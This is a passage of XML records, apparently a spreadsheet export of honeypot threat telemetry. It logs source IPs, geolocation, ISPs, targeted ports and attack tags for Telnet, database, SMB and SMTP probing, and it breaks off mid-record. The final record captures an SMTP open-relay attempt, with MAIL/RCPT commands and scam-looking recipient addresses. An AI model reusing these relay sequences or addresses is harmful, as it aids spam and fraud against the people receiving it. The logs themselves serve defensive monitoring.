    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:63a3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1326"/>
    <x v="1326"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:29:49"/>
    <d v="2025-04-17T12:52:14"/>
    <d v="2025-04-17T13:29:49"/>
    <n v="51"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata"/>
    <s v="1275004"/>
    <s v="NA"/>
    <s v="22.5626"/>
    <s v="88.363"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Sweety"/>
    <s v="2021-08-18"/>
    <s v="SWEETY"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ab:f677"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1327"/>
    <x v="1327"/>
    <s v="217-209-11-246-no600.tbcn.telia.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:18:16"/>
    <d v="2025-04-15T21:26:22"/>
    <d v="2025-04-17T13:18:16"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="O"/>
    <s v="Västra Götaland"/>
    <s v="Lidköping Municipality"/>
    <s v="Lidköping"/>
    <s v="2696329"/>
    <s v="531 01"/>
    <s v="58.5035"/>
    <s v="13.1571"/>
    <s v="3301"/>
    <s v="Telia Company AB"/>
    <s v="Telia Company AB"/>
    <s v="business"/>
    <s v="Telia Network Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d9d1:bf6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1328"/>
    <x v="1328"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:10:16"/>
    <d v="2024-08-16T18:42:34"/>
    <d v="2025-04-17T13:10:16"/>
    <n v="1712"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;24774&amp;&amp;NA&amp;&amp;60974&amp;&amp;53058"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3638"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="KORNET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:de66:bf92"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1329"/>
    <x v="1329"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T13:05:53"/>
    <d v="2024-04-09T10:01:00"/>
    <d v="2025-04-17T13:05:53"/>
    <n v="91"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;19865&amp;&amp;1433&amp;&amp;32229&amp;&amp;445&amp;&amp;62862&amp;&amp;62856"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Ludhiana (Aggar Nagar - B Block)"/>
    <s v="1264728"/>
    <s v="141001"/>
    <s v="30.8869"/>
    <s v="75.7909"/>
    <s v="133661"/>
    <s v="Netplus Broadband Services Private Limited"/>
    <s v="Himachal Future Cable And Datacom Private Limited"/>
    <s v="residential"/>
    <s v="Himachal Future Cable And Datacom Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.72.169.219,58214)}&amp;&amp;{Data_SMB:Incoming connection (103.72.169.219,2461)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6748:a9db"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1330"/>
    <x v="1330"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:54:33"/>
    <d v="2025-04-17T12:48:26"/>
    <d v="2025-04-17T12:54:33"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="RU"/>
    <s v="Russia"/>
    <s v="43"/>
    <s v="Crimea"/>
    <s v="Simferopol Raion"/>
    <s v="Simferopol"/>
    <s v="693805"/>
    <s v="NA"/>
    <s v="44.9521"/>
    <s v="34.1024"/>
    <s v="48004"/>
    <s v="PE Tsibrankov Konstantin Igorevich"/>
    <s v="PE Tsibrankov Konstantin Igorevich"/>
    <s v="business"/>
    <s v="KCT"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c312:10de"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1331"/>
    <x v="1331"/>
    <s v="s919040155.blix.com"/>
    <x v="0"/>
    <d v="2025-04-17T12:47:18"/>
    <d v="2025-04-17T12:46:37"/>
    <d v="2025-04-17T12:47:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NO"/>
    <s v="Norway"/>
    <s v="03"/>
    <s v="Oslo"/>
    <s v="Oslo"/>
    <s v="Oslo"/>
    <s v="3143244"/>
    <s v="0001"/>
    <s v="59.9139"/>
    <s v="10.7522"/>
    <s v="50304"/>
    <s v="Blix Solutions AS"/>
    <s v="Blix Solutions"/>
    <s v="business"/>
    <s v="Blixcust10412"/>
    <s v="2006-11-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1997-02-03 05:00:00"/>
    <s v="2033-02-04 05:00:00"/>
    <s v="2023-10-06 08:20:58"/>
    <s v="['N.BLIX.EU', 'NS1.BLIX.COM', 'NS2.BLIX.COM', 'S.BLIX.EU']"/>
    <s v="CSL Computer Service Langenbach GmbH d/b/a joker.com"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="27"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:5b5a:289b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1332"/>
    <x v="1332"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:41:00"/>
    <d v="2025-01-18T11:33:23"/>
    <d v="2025-04-17T12:41:00"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H44"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JT"/>
    <s v="Central Java"/>
    <s v="Kota Semarang"/>
    <s v="Semarang"/>
    <s v="1627896"/>
    <s v="NA"/>
    <s v="-6.99306"/>
    <s v="110.421"/>
    <s v="4761"/>
    <s v="PT. INDOSAT Tbk"/>
    <s v="PT. INDOSAT Tbk"/>
    <s v="business"/>
    <s v="IOH B2B"/>
    <s v="2008-04-14"/>
    <s v="IOH-B2B-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (114.10.44.121,65289)}&amp;&amp;{Data_SMB:Incoming connection (114.10.44.121,19469)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:720a:2c79"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1333"/>
    <x v="1333"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:29:56"/>
    <d v="2025-01-12T14:27:29"/>
    <d v="2025-04-17T12:29:56"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.2088"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Communication Ltd"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f5:d08c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1334"/>
    <x v="1334"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:29:32"/>
    <d v="2025-02-17T20:09:28"/>
    <d v="2025-04-17T12:29:32"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H21"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="SN"/>
    <s v="South Sulawesi"/>
    <s v="Barru Regency"/>
    <s v="Barru"/>
    <s v="1649976"/>
    <s v="NA"/>
    <s v="-4.412"/>
    <s v="119.618"/>
    <s v="9341"/>
    <s v="PT Indonesia Comnets Plus"/>
    <s v="PT. Indonesia Comnets Plus"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2019-11-05"/>
    <s v="IDNIC-LUGA-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.144.227.162,64302)}&amp;&amp;{Data_SMB:Incoming connection (103.144.227.162,44003)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.144.227.162,44061)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6790:e3a2"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1335"/>
    <x v="1335"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:24:58"/>
    <d v="2024-05-06T12:01:00"/>
    <d v="2025-04-17T12:24:58"/>
    <n v="3815"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;18344&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="BJ"/>
    <s v="Benin"/>
    <s v="LI"/>
    <s v="Littoral"/>
    <s v="Cotonou"/>
    <s v="Cotonou (Cadjèhoun)"/>
    <s v="2394819"/>
    <s v="NA"/>
    <s v="6.35275"/>
    <s v="2.42299"/>
    <s v="328228"/>
    <s v="SOCIETE BENINOISE D'INFRASTRUCTURES NUMERIQUES"/>
    <s v="SOCIETE BENINOISE D'INFRASTRUCTURES NUMERIQUES"/>
    <s v="residential"/>
    <s v="Benin Telecoms Infrastructures SA"/>
    <s v="2010-03-11"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,39585)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,7073)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,7937)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,35105)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,36033)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,51553)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,52161)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,33665)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,34817)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,42561)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,58273)}&amp;&amp;{Data_SMB:Incoming connection (81.91.232.98,59137)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:515b:e862"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1336"/>
    <x v="1336"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:23:44"/>
    <d v="2025-04-15T19:52:37"/>
    <d v="2025-04-17T12:23:44"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="PY"/>
    <s v="Paraguay"/>
    <s v="11"/>
    <s v="Central Department"/>
    <s v="San Lorenzo"/>
    <s v="Fernando de la Mora (Fernando Zona Sur)"/>
    <s v="3438115"/>
    <s v="NA"/>
    <s v="-25.3288"/>
    <s v="-57.565"/>
    <s v="23201"/>
    <s v="Telecel S.A."/>
    <s v="Telecel S.A."/>
    <s v="business"/>
    <s v="Telecel S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b57e:e4ef"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1337"/>
    <x v="1337"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T12:14:42"/>
    <d v="2025-03-26T14:32:38"/>
    <d v="2025-04-17T12:14:42"/>
    <n v="70"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Credential Stuffing"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H32"/>
    <s v="25"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="214940"/>
    <s v="KPROHOST LLC"/>
    <s v="Kprohost LLC"/>
    <s v="hosting"/>
    <s v="Kprohost"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 26 Mar 2025 02:02:37 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;xx@mail.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;fede-xoffice@gmx.com.my&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;atmpayment512@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;moneygram0901@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;salisuibrahim316@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;servicecustomer529@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '94.131.97.67_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 26 Mar 2025 10:18:56 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '156.244.37.11_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 27 Mar 2025 